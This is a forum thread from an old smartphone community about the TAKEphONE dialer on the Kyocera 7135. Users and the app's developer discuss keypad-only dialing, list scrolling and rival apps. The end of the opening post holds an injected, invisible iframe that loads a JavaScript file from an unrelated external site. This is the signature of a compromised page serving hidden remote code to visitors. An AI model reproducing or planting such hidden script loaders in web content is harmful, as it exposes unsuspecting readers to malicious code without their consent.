+ Reply to Thread
Page 1 of 20 1 2 3 4 5 11 ... LastLast
    I-300 Novice

TakePhone 5.04 Dialer

I just loaded the new version of Takephone onto my 7135 and it is great! Anyone who has not tried it should definitely do so...

One question for you gurus...is there a way to get it so that TakePhone is the initial screen that I see when I flip open my 7135? I have it set up so that it comes up when I hit the 'phone' button next to the center toggle already and was hoping there was possibly a way to have it come up automatically.

Thanks in advance for your input.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Ahmed V. Ismail
    A Smartphone Addict

I found it crashes my 7135 all the time. Have you had problems with crashes?

--Richard

I-300 Novice
    Not at all.....are you running 5.04?

If you are seriously having a problem, I would e-mail the developer. I have been using the program since I first bought my I-300 and have never seen any software developer respond so quickly to a questions or a problem.

I will let you know if I do run into a problem.
    Ahmed V. Ismail
    A Smartphone Addict

4.64 is the latest version that I can find. I emailed the developer. Thanks.

Not bad...BUT

Originally posted by PHCismail
    Not at all.....are you running 5.04?

If you are seriously having a problem, I would e-mail the developer. I have been using the program since I first bought my I-300 and have never seen any software developer respond so quickly to a questions or a problem.

I will let you know if I do run into a problem.
    I played with TAKEphONE all weekend. I think I like FingerDial better.

With TAKEphONE I had to use the stylus too much. FingerDials buttons are big enough to allow you to find what you need without using the stylus. I did like the dialer in TAKEphONE though.

Check it out. http://www.fingerclick.com

He also has a nice FingerMemo program, I wrote the developer to see if he would integrate the VOICE memo feature of the 7135 into his program, but he did not seem interested.

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

I just want the same function in a phone dialing app that I have on my cheapie Kyocera 2235. I don't want to use my fingers or a stylus on the screen. I want to dial a entry using the phonepad. Example:
    JONATHAN:

5 - Speed dial entry appears (if any)
    6 - Speed dial entry appears (if any ) or JOAN pops up first and I can use the down arrow to get other entries
    6 - JONATHAN pops up

Why is it that Kyocera can do this with the 2235 and not with the 7135?

I haven't explored Takephone but I did try out Fingerdial and it does require touching the screen. Perhaps I didn't try it out long enough though.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

Re: Not bad...BUT

Originally posted by djjefft
    I played with TAKEphONE all weekend. I think I like FingerDial better.

With TAKEphONE I had to use the stylus too much.

Jeff
    Hi all,

Nice to be discussed again...

Jeff - could you elaborate on what you had to use the stylus for - I am currently working on this next TAKEphONE release, and any idea for improvement is most welcome !

Thanks,
    Shimon Shnitzer
    Maker of TAKEphONE -
    "Take telephony into your Palm"

Originally posted by Beryl
    I haven't explored Takephone but I did try out Fingerdial and it does require touching the screen. Perhaps I didn't try it out long enough though.
    Hi,

What I am trying to do now is use the 7135 buttons ("2abc", "3def"...) in stead of the on-screen buttons to eliminate the need of touching the screen...
    Shimon Shnitzer
    Maker of TAKEphONE -

Re: Re: Not bad...BUT

Originally posted by TAKEphONE
    Hi all,

Nice to be discussed again...

Jeff - could you elaborate on what you had to use the stylus for - I am currently working on this next TAKEphONE release, and any idea for improvement is most welcome !

Thanks,
    Once you get it down to the person, or persons that match, the box that those searched is in...is kind of small. If you have more than one choice, it makes it kinda of tight to hit with the finger.
    Jeff
    Tampa FL

Hi,

What I am trying to do now is use the 7135 buttons ("2abc", "3def"...) in stead of the on-screen buttons to eliminate the need of touching the screen...
    Would LOVE to see this, as I am not a BIG fan of touching the screen if I don't have to.

Jeff
    Jeff
    Tampa FL

Re: Re: Re: Not bad...BUT

Once you get it down to the person, or persons that match, the box that those searched is in...is kind of small. If you have more than one choice, it makes it kinda of tight to hit with the finger.
    May I suggest these solutions:
    1. You can use the hardware scroll buttons (jog-dial on the 6035) to scroll the list, then "OK" to select.
    2. If you tap the list (I know - you dont want to, but...) and hold it (a long tap), a bigger list or buttons displays the matches.
    3. You can set TAKEphONE to open this list ("Zoom" in) automatically when there are 10 or less matches.

Making any sense ?
    Shimon Shnitzer
    Maker of TAKEphONE -

I-300 Novice
    Hi Jeff,

I don't use a stylus or touch the screen at all.

I use the keypad to enter in the search criteria (what an improvement from having to try to hit the virtual buttons on my old I-300) and then use the center toggle button to go up or down to the actual caller I want to reach.

Once I find them, I click on the center OK button, then toggle down to which of their numbers I want to call.

One of the reason I was so psyched about the program on the 7135 is that I don't have to use a stylus or touch the screen to make calls. Try it...if you don't have Version 5.04, e-mail the developer and I am sure he'll send you a demo.
    Ahmed V. Ismail
    A Smartphone Addict

I-300 Novice
    To the Gurus of the forum...

Any ideas on my question in my first post re: getting TakePhone to come up when I flip open my phone?
    Ahmed V. Ismail
    A Smartphone Addict

Shimon
    If you can use the 7135 button, i would love that, i just love your software but with this it would be perfect, and when you get to the contact if we could use the scroll button and just push ok to dial
    If you get it to work i would like to test it for you
    Thank you

marc-Andre

That is good to hear and if you want a tester, I'm available. I currently use freeware called "Notap" (it was shareware when I registered it though). Notap just uses hardware buttons to access address book entries. It does not support dialing but it does invoke the phone's Address app eventually which does.

I'd rather use an app that I can use with one hand and the phone's keys -- no stylist, no fingers.

I-300 Novice
    FYI to all...

The version I am using (5.04) does exactly that...you use the keypad and the toggle/OK button to control all of the fuctions from searching to dialing. No need for the stylus or touching the screen. It is great!!
    Ahmed V. Ismail
    A Smartphone Addict

hmmm

Originally posted by PHCismail
    FYI to all...

The version I am using (5.04) does exactly that...you use the keypad and the toggle/OK button to control all of the fuctions from searching to dialing. No need for the stylus or touching the screen. It is great!!
    I reinstalled the program to give it another chance. I love the keyed look ups, but when i get 8-10 choices, it just jumps from the top to the bottom of the list...it wont toggle THRU the list.

Jeff
    Jeff
    Tampa FL

Re: hmmm

I reinstalled the program to give it another chance. I love the keyed look ups, but when i get 8-10 choices, it just jumps from the top to the bottom of the list...it wont toggle THRU the list.

Jeff
    I think I can help here...
    This is due to the way the s/w worked with the 6035, and it's Jog-Dial - by default the Jog-Dial scrolled line-by-line, and the Up/Down scroll buttons scrolled pages.

To solve this - just goto "Options/General preferences", tap the "Kyocera SmartPhone options" button, and uncheck the option.

Hope this helps,
    Shimon Shnitzer
    Maker of TAKEphONE -

1. Where are you guys getting version 5.04?

2. I downloaded and tried FingerDial 3.0. It's way too slow with a large Address file. I have 2156 records in mine. Even when setting FingerDial not to look until 4 keys are pressed, and to look only at last name, it takes several seconds to begin to report results. Takephone is much, much faster. Way to go, Shimon.

e-mail the creator

Originally posted by gellmanb
    1. Where are you guys getting version 5.04?

2. I downloaded and tried FingerDial 3.0. It's way too slow with a large Address file. I have 2156 records in mine. Even when setting FingerDial not to look until 4 keys are pressed, and to look only at last name, it takes several seconds to begin to report results. Takephone is much, much faster. Way to go, Shimon.
    E-mail Shimon...I'm sure he will get it to you.

Jeff
    Jeff
    Tampa FL

+ Reply to Thread
Page 1 of 20 1 2 3 4 5 11 ... LastLast